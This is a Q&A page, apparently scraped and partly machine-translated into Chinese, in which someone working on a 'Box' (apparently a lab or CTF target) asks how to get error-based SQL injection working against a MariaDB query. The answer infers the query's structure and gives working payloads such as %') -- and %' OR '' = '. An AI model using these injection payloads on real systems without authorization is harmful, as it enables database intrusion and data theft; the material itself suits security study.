syntax - How to find out the right syntax in MariaDB Error Based SQL Injection?
问题描述
I am trying to inject SQL statements into a Box. I have the following injection point:
example.com/?o=1&page=app
when I inject 1' then I receive the following error message:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
I was trying to inject the following:
1' ORDER BY 1 --
I still get error message and I don't know how to close the statement:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER BY 1 --') and ( dest like '5' or dest like '1' ORDER BY 1 --') LIMIT 10' at line 1
What I am doing wrong? Thanks for the answers!
解决方案
鉴于当您尝试1'包含的查询时'1'',原始查询似乎是这样的:
... '5' or dest like '$o') LIMIT 10
例如
SELECT * FROM table WHERE (category = '5' or dest like '$o') LIMIT 10
要使其成为有效查询,您需要关闭括号。
例如%') --,给出:
SELECT * FROM table WHERE (category = '5' or dest like '%') --') LIMIT 10
或%' OR '' = ',给出:
SELECT * FROM table WHERE (category = '5' or dest like '%' OR '' = '') LIMIT 10
推荐阅读
- angularjs - 如何在 Angular UI 网格中用鼠标选择一列?
- r - R read.xlsx 仅指定某些列 ColClasses
- ruby-on-rails - 将 rufus-scheduler 日志传递到 production.log 文件
- postgresql - PostgreSQL 带索引的慢更新
- javascript - 我在命令提示符下从 MySQL 获取值。但是聊天机器人中的值如何显示?
- sql - 选择其父类为类型 1 的类别
- amazon-web-services - 如何仅使用 javascript 代码创建 Ec2 实例
- java - Java 不好的做法:new... ().doSomething()?
- sabre - 预订航段(EnhancedAirbook)和出票(AirTicket)之前的“AAA”
- graphql - GraphQL 解析器仅解析第一种类型